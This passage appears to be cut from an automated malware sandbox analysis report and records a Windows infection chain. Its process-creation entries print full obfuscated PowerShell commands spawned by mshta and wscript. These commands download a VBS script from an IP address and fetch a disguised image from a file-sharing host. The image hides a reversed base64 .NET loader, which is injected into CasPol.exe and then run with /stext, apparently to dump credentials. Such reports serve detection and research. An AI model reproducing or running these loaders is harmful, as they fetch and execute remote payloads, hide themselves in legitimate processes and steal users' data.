k=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                  Injects a PE file into a foreign processes
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 400000 value starts with: 4D5AJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 400000 value starts with: 4D5A
                  Maps a DLL or memory area into another process
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe protection: execute and read and write
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe protection: execute and read and write
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe protection: execute and read and write
                  Writes to foreign memory regions
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 400000Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 401000Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 457000Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 470000Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 476000Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 47B000Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 7EFDE008Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 400000
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 401000
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 457000
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 470000
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 476000
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 47B000
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 7EFDE008
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe35_2_00410F36
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 35_2_00418754 mouse_event,35_2_00418754
                  Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\sYSTeM32\WinDowSPOWeRSHelL\V1.0\PoWersHell.Exe" "pOWerSHeLL.EXe -Ex BypasS -noP -W 1 -c dEVICecREDEntIAlDEplOymENT.exE ; iEx($(Iex('[sYsTEm.TEXt.ENCodinG]'+[ChAr]0X3A+[Char]0x3A+'uTf8.GetSTRiNg([SYSTeM.ConveRt]'+[CHAr]0x3a+[ChAR]0X3A+'FROMBASE64StRING('+[cHaR]0x22+'JHZiS3kyVzJoWiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC1UeXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tRU1CRVJEZUZJbml0aU9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxtT24iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG1hS29BY2gsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHNNTlFvZnJsUUUsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGhadFZYTk9QLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVExxUHptVSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUHRMKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQU1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ1QUl0R1YiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lU3BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc2lsZGJGTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICR2Ykt5MlcyaFo6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjM0LjIwNS4xMzUvMTI0NC9jcmVhdGdvb2RpZGVhZm9yZnV0dXJlYnVzaW5lc3NkZXZlbG9wd2l0aG5pY2V0aGluZ3NnZXRiYWNrb24udElGIiwiJEVOVjpBUFBEQVRBXGNyZWF0Z29vZGlkZWFmb3JmdXR1cmVidXNpbmVzc2RldmVsb3B3aXRobmljZXRoaW4udkJzIiwwLDApO3N0QVJULVNsRWVwKDMpO0lFeCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVuVjpBUFBEQVRBXGNyZWF0Z29vZGlkZWFmb3JmdXR1cmVidXNpbmVzc2RldmVsb3B3aXRobmljZXRoaW4udkJzIg=='+[ChAR]0x22+'))')))"Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex BypasS -noP -W 1 -c dEVICecREDEntIAlDEplOymENT.exEJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\b53lag2c\b53lag2c.cmdline"Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\creatgoodideaforfuturebusinessdevelopwithnicethin.vBs" Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES3100.tmp" "c:\Users\user\AppData\Local\Temp\b53lag2c\CSCFF6E95784C84671B5586A4811C47.TMP"Jump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnbkVyaW1hZ2VVcmwgPSBaTTVodHRwczovLzMxMDUuZmlsZW1haWwuY29tL2FwaS9maWxlL2dldD9maWwnKydla2V5PXNoVFBIYkNQWDhvLWxPdENxSExHNl8weEN5LXhsNHRueGxBVmJROScrJzUtJysnZHZpVEs1Y0FSYU5kUScrJ2piYjNtZXhmd1F6S21UWGcnKycmc2tpcHJlZz10cnVlJnBrX3ZpZCcrJz1lMDEwOTYzOGM5YmZiOTU3MTczMjUzMTMwOWI1ZmY3YyBaJysnTTU7bkVyd2UnKydiQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkMnKydsaWVudDtuRXJpbWFnZUJ5dGVzID0gbkVyd2ViQ2xpZW50LkRvd25sb2FkRGF0YSgnKyduRXJpbWFnZVVybCk7bkVyaW1hZ2VUZXh0ID0gWycrJ1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHInKydpbmcobkVyaW1hZ2VCeScrJ3Rlcyk7bkVyc3RhcnRGbGFnID0nKycgWk01PDxCQVNFNjRfU1RBUlQ+PlpNNScrJztuRXJlbmRGbGFnID0gWk01PDxCQVNFNjRfJysnRU5EPj5aTTU7bkVyc3RhcnRJbmRleCA9IG5FcmltYWdlVGV4JysndC5JbmRleE9mKG5FcnN0YXJ0RmxhZyk7bkVyZW5kSW5kJysnZXggPSBuRXJpbWFnZVRleHQuSW5kZXhPZignKyduRXJlbmRGbGFnKTtuRScrJ3JzdGFydEluJysnZGV4IC1nZSAwIC1hbmQgbkVyZW5kSW5kZXggLWd0IG5FcnN0YXJ0SW5kZXg7bkVyc3RhcnRJbmRleCArPSBuRXJzdGFydEZsYWcuTGVuZ3RoO25FcmJhc2U2NCcrJ0wnKydlbmd0aCA9IG5FcmVuZEluZGUnKyd4IC0gbkVyc3RhJysncnRJbmRleDtuRXJiYXNlNjRDb21tYW5kID0gbkVyaW1hZ2VUZXh0LlN1YnN0cmluZyhuRXJzdGFydEluZGV4LCBuRXJiYXNlNjRMZW5ndGgnKycpO25FcmJhc2U2NFJldmVyc2VkID0gLWpvaW4gKG5FcmJhJysnc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSBKSTYgRm9yRWFjaCcrJy1PYmplY3QgeyBuRXJfIH0pWy0xLi4tKG5FcmJhc2U2NENvbW1hbmQuTGVuZ3RoKV07bkVyY29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6JysnRnJvbUJhcycrJ2U2NFN0cmluZyhuRXJiYXNlNjRSZXZlcnNlZCk7bkVybG9hZGVkQXNzZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKG5FcmNvbW1hbmRCeXRlcyk7bkVydmFpTWV0aG9kID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCcrJyhaTTVWQUlaTTUpO25FcnZhaU1ldGhvZC5JbnZva2UobkVybnVsbCwgQChaTTV0eHQuUlNSVlJTLycrJzQ0MjEvNTMxLjUnKycwMi40MzIuMjcxLy86cHR0aFpNNSwgWk01JysnZGVzYXRpdmFkb1pNNSwgWk01ZGVzYXRpdmFkb1pNNSwgWk01ZGVzYXRpdmFkb1pNJysnNSwgWk01Q2FzUG9sWk01LCBaTTVkZXNhdGl2YWRvWk01LCBaTTVkZXNhdGl2YWRvWk01LFpNNWRlc2F0aXZhZG9aTTUsWicrJ001ZGVzYXRpdmFkb1onKydNNSxaTTVkZXNhdGl2YWRvJysnWk0nKyc1LFpNNWRlc2F0aXZhZG9aTTUsWk01ZGVzYXRpdmFkJysnb1pNNScrJyxaTTUxWk01LFpNNWRlc2F0aXZhZG9aTTUpKTsnKSAgLVJlUGxhY0UgIChbY2hhcl0xMTArW2NoYXJdNjkrW2NoYXJdMTE0KSxbY2hhcl0zNi1DUmVwbEFjRSAgJ1pNNScsW2NoYXJdMzkgIC1SZVBsYWNFKFtjaGFyXTc0K1tjaGFyXTczK1tjaGFyXTU0KSxbY2hhcl0xMjQpfCYgKCAkcFNIT01FWzRdKyRQU2hPTUVbMzBdKyd4Jyk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('nErimageUrl = ZM5https://3105.filemail.com/api/file/get?fil'+'ekey=shTPHbCPX8o-lOtCqHLG6_0xCy-xl4tnxlAVbQ9'+'5-'+'dviTK5cARaNdQ'+'jbb3mexfwQzKmTXg'+'&skipreg=true&pk_vid'+'=e0109638c9bfb9571732531309b5ff7c Z'+'M5;nErwe'+'bClient = New-Object System.Net.WebC'+'lient;nErimageBytes = nErwebClient.DownloadData('+'nErimageUrl);nErimageText = ['+'System.Text.Encoding]::UTF8.GetStr'+'ing(nErimageBy'+'tes);nErstartFlag ='+' ZM5<<BASE64_START>>ZM5'+';nErendFlag = ZM5<<BASE64_'+'END>>ZM5;nErstartIndex = nErimageTex'+'t.IndexOf(nErstartFlag);nErendInd'+'ex = nErimageText.IndexOf('+'nErendFlag);nE'+'rstartIn'+'dex -ge 0 -and nErendIndex -gt nErstartIndex;nErstartIndex += nErstartFlag.Length;nErbase64'+'L'+'ength = nErendInde'+'x - nErsta'+'rtIndex;nErbase64Command = nErimageText.Substring(nErstartIndex, nErbase64Length'+');nErbase64Reversed = -join (nErba'+'se64Command.ToCharArray() JI6 ForEach'+'-Object { nEr_ })[-1..-(nErbase64Command.Length)];nErcommandBytes = [System.Convert]::'+'FromBas'+'e64String(nErbase64Reversed);nErloadedAssembly = [System.Reflection.Assembly]::Load(nErcommandBytes);nErvaiMethod = [dnlib.IO.Home].GetMethod'+'(ZM5VAIZM5);nErvaiMethod.Invoke(nErnull, @(ZM5txt.RSRVRS/'+'4421/531.5'+'02.432.271//:ptthZM5, ZM5'+'desativadoZM5, ZM5desativadoZM5, ZM5desativadoZM'+'5, ZM5CasPolZM5, ZM5desativadoZM5, ZM5desativadoZM5,ZM5desativadoZM5,Z'+'M5desativadoZ'+'M5,ZM5desativado'+'ZM'+'5,ZM5desativadoZM5,ZM5desativad'+'oZM5'+',ZM51ZM5,ZM5desativadoZM5));') -RePlacE ([char]110+[char]69+[char]114),[char]36-CReplAcE 'ZM5',[char]39 -RePlacE([char]74+[char]73+[char]54),[char]124)|& ( $pSHOME[4]+$PShOME[30]+'x')"Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"Jump to behavior
                  Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\sYSTeM32\WinDowSPOWeRSHelL\V1.0\PoWersHell.Exe" "pOWerSHeLL.EXe -Ex BypasS -noP -W 1 -c dEVICecREDEntIAlDEplOymENT.exE ; iEx($(Iex('[sYsTEm.TEXt.ENCodinG]'+[ChAr]0X3A+[Char]0x3A+'uTf8.GetSTRiNg([SYSTeM.ConveRt]'+[CHAr]0x3a+[ChAR]0X3A+'FROMBASE64StRING('+[cHaR]0x22+'JHZiS3kyVzJoWiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC1UeXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tRU1CRVJEZUZJbml0aU9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxtT24iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG1hS29BY2gsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHNNTlFvZnJsUUUsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGhadFZYTk9QLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVExxUHptVSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUHRMKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQU1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ1QUl0R1YiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lU3BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc2lsZGJGTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICR2Ykt5MlcyaFo6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjM0LjIwNS4xMzUvMTI0NC9jcmVhdGdvb2RpZGVhZm9yZnV0dXJlYnVzaW5lc3NkZXZlbG9wd2l0aG5pY2V0aGluZ3NnZXRiYWNrb24udElGIiwiJEVOVjpBUFBEQVRBXGNyZWF0Z29vZGlkZWFmb3JmdXR1cmVidXNpbmVzc2RldmVsb3B3aXRobmljZXRoaW4udkJzIiwwLDApO3N0QVJULVNsRWVwKDMpO0lFeCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVuVjpBUFBEQVRBXGNyZWF0Z29vZGlkZWFmb3JmdXR1cmVidXNpbmVzc2RldmVsb3B3aXRobmljZXRoaW4udkJzIg=='+[ChAR]0x22+'))')))"Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex BypasS -noP -W 1 -c dEVICecREDEntIAlDEplOymENT.exE
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ovqlooon\ovqlooon.cmdline"
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\creatgoodideaforfuturebusinessdevelopwithnicethin.vBs"
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES77DF.tmp" "c:\Users\user\AppData\Local\Temp\ovqlooon\CSCADDA0BE83C5E4E17A4EF3CEA725DA.TMP"
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnbkVyaW1hZ2VVcmwgPSBaTTVodHRwczovLzMxMDUuZmlsZW1haWwuY29tL2FwaS9maWxlL2dldD9maWwnKydla2V5PXNoVFBIYkNQWDhvLWxPdENxSExHNl8weEN5LXhsNHRueGxBVmJROScrJzUtJysnZHZpVEs1Y0FSYU5kUScrJ2piYjNtZXhmd1F6S21UWGcnKycmc2tpcHJlZz10cnVlJnBrX3ZpZCcrJz1lMDEwOTYzOGM5YmZiOTU3MTczMjUzMTMwOWI1ZmY3YyBaJysnTTU7bkVyd2UnKydiQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkMnKydsaWVudDtuRXJpbWFnZUJ5dGVzID0gbkVyd2ViQ2xpZW50LkRvd25sb2FkRGF0YSgnKyduRXJpbWFnZVVybCk7bkVyaW1hZ2VUZXh0ID0gWycrJ1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHInKydpbmcobkVyaW1hZ2VCeScrJ3Rlcyk7bkVyc3RhcnRGbGFnID0nKycgWk01PDxCQVNFNjRfU1RBUlQ+PlpNNScrJztuRXJlbmRGbGFnID0gWk01PDxCQVNFNjRfJysnRU5EPj5aTTU7bkVyc3RhcnRJbmRleCA9IG5FcmltYWdlVGV4JysndC5JbmRleE9mKG5FcnN0YXJ0RmxhZyk7bkVyZW5kSW5kJysnZXggPSBuRXJpbWFnZVRleHQuSW5kZXhPZignKyduRXJlbmRGbGFnKTtuRScrJ3JzdGFydEluJysnZGV4IC1nZSAwIC1hbmQgbkVyZW5kSW5kZXggLWd0IG5FcnN0YXJ0SW5kZXg7bkVyc3RhcnRJbmRleCArPSBuRXJzdGFydEZsYWcuTGVuZ3RoO25FcmJhc2U2NCcrJ0wnKydlbmd0aCA9IG5FcmVuZEluZGUnKyd4IC0gbkVyc3RhJysncnRJbmRleDtuRXJiYXNlNjRDb21tYW5kID0gbkVyaW1hZ2VUZXh0LlN1YnN0cmluZyhuRXJzdGFydEluZGV4LCBuRXJiYXNlNjRMZW5ndGgnKycpO25FcmJhc2U2NFJldmVyc2VkID0gLWpvaW4gKG5FcmJhJysnc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSBKSTYgRm9yRWFjaCcrJy1PYmplY3QgeyBuRXJfIH0pWy0xLi4tKG5FcmJhc2U2NENvbW1hbmQuTGVuZ3RoKV07bkVyY29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6JysnRnJvbUJhcycrJ2U2NFN0cmluZyhuRXJiYXNlNjRSZXZlcnNlZCk7bkVybG9hZGVkQXNzZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKG5FcmNvbW1hbmRCeXRlcyk7bkVydmFpTWV0aG9kID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCcrJyhaTTVWQUlaTTUpO25FcnZhaU1ldGhvZC5JbnZva2UobkVybnVsbCwgQChaTTV0eHQuUlNSVlJTLycrJzQ0MjEvNTMxLjUnKycwMi40MzIuMjcxLy86cHR0aFpNNSwgWk01JysnZGVzYXRpdmFkb1pNNSwgWk01ZGVzYXRpdmFkb1pNNSwgWk01ZGVzYXRpdmFkb1pNJysnNSwgWk01Q2FzUG9sWk01LCBaTTVkZXNhdGl2YWRvWk01LCBaTTVkZXNhdGl2YWRvWk01LFpNNWRlc2F0aXZhZG9aTTUsWicrJ001ZGVzYXRpdmFkb1onKydNNSxaTTVkZXNhdGl2YWRvJysnWk0nKyc1LFpNNWRlc2F0aXZhZG9aTTUsWk01ZGVzYXRpdmFkJysnb1pNNScrJyxaTTUxWk01LFpNNWRlc2F0aXZhZG9aTTUpKTsnKSAgLVJlUGxhY0UgIChbY2hhcl0xMTArW2NoYXJdNjkrW2NoYXJdMTE0KSxbY2hhcl0zNi1DUmVwbEFjRSAgJ1pNNScsW2NoYXJdMzkgIC1SZVBsYWNFKFtjaGFyXTc0K1tjaGFyXTczK1tjaGFyXTU0KSxbY2hhcl0xMjQpfCYgKCAkcFNIT01FWzRdKyRQU2hPTUVbMzBdKyd4Jyk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('nErimageUrl = ZM5https://3105.filemail.com/api/file/get?fil'+'ekey=shTPHbCPX8o-lOtCqHLG6_0xCy-xl4tnxlAVbQ9'+'5-'+'dviTK5cARaNdQ'+'jbb3mexfwQzKmTXg'+'&skipreg=true&pk_vid'+'=e0109638c9bfb9571732531309b5ff7c Z'+'M5;nErwe'+'bClient = New-Object System.Net.WebC'+'lient;nErimageBytes = nErwebClient.DownloadData('+'nErimageUrl);nErimageText = ['+'System.Text.Encoding]::UTF8.GetStr'+'ing(nErimageBy'+'tes);nErstartFlag ='+' ZM5<<BASE64_START>>ZM5'+';nErendFlag = ZM5<<BASE64_'+'END>>ZM5;nErstartIndex = nErimageTex'+'t.IndexOf(nErstartFlag);nErendInd'+'ex = nErimageText.IndexOf('+'nErendFlag);nE'+'rstartIn'+'dex -ge 0 -and nErendIndex -gt nErstartIndex;nErstartIndex += nErstartFlag.Length;nErbase64'+'L'+'ength = nErendInde'+'x - nErsta'+'rtIndex;nErbase64Command = nErimageText.Substring(nErstartIndex, nErbase64Length'+');nErbase64Reversed = -join (nErba'+'se64Command.ToCharArray() JI6 ForEach'+'-Object { nEr_ })[-1..-(nErbase64Command.Length)];nErcommandBytes = [System.Convert]::'+'FromBas'+'e64String(nErbase64Reversed);nErloadedAssembly = [System.Reflection.Assembly]::Load(nErcommandBytes);nErvaiMethod = [dnlib.IO.Home].GetMethod'+'(ZM5VAIZM5);nErvaiMethod.Invoke(nErnull, @(ZM5txt.RSRVRS/'+'4421/531.5'+'02.432.271//:ptthZM5, ZM5'+'desativadoZM5, ZM5desativadoZM5, ZM5desativadoZM'+'5, ZM5CasPolZM5, ZM5desativadoZM5, ZM5desativadoZM5,ZM5desativadoZM5,Z'+'M5desativadoZ'+'M5,ZM5desativado'+'ZM'+'5,ZM5desativadoZM5,ZM5desativad'+'oZM5'+',ZM51ZM5,ZM5desativadoZM5));') -RePlacE ([char]110+[char]69+[char]114),[char]36-CReplAcE 'ZM5',[char]39 -RePlacE([char]74+[char]73+[char]54),[char]124)|& ( $pSHOME[4]+$PShOME[30]+'x')"
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\celvhtcxiwczckrdjzxnvyxm"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\eyqfiluzweuemqnhakkgfkrdatg"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\oavyjefskmmjowblkvxiixmujzxyrr"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\oavyjefskmmjowblkvxiixmujzxyrr"
                  Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "powershell.exe -ex bypass -nop -w 1 -c devicecredentialdeployment.exe ; iex($(iex('[system.text.encoding]'+[char]0x3a+[char]0x3a+'utf8.getstring([system.convert]'+[char]0x3a+[char]0x3a+'frombase64string('+[char]0x22+'jhzis3kyvzjowiagicagicagicagicagicagicagicagicagicagicagica9icagicagicagicagicagicagicagicagicagicagicagigfkzc1uexbficagicagicagicagicagicagicagicagicagicagicagic1tru1crvjezuzjbml0au9uicagicagicagicagicagicagicagicagicagicagicagicdbrgxssw1wb3j0kcj1ckxtt24ilcagicagicagicagicagicagicagicagicagicagicagicbdagfyu2v0id0gq2hhclnldc5vbmljb2rlkv1wdwjsawmgc3rhdgljigv4dgvybibjbnrqdhigvvjmrg93bmxvywrub0zpbguosw50uhryicagicagicagicagicagicagicagicagicagicagicagig1hs29by2gsc3ryaw5nicagicagicagicagicagicagicagicagicagicagicagihnntlfvznjsuuusc3ryaw5nicagicagicagicagicagicagicagicagicagicagicagighadfzytk9qlhvpbnqgicagicagicagicagicagicagicagicagicagicagicagvexxuhptvsxjbnrqdhigicagicagicagicagicagicagicagicagicagicagicaguhrmktsnicagicagicagicagicagicagicagicagicagic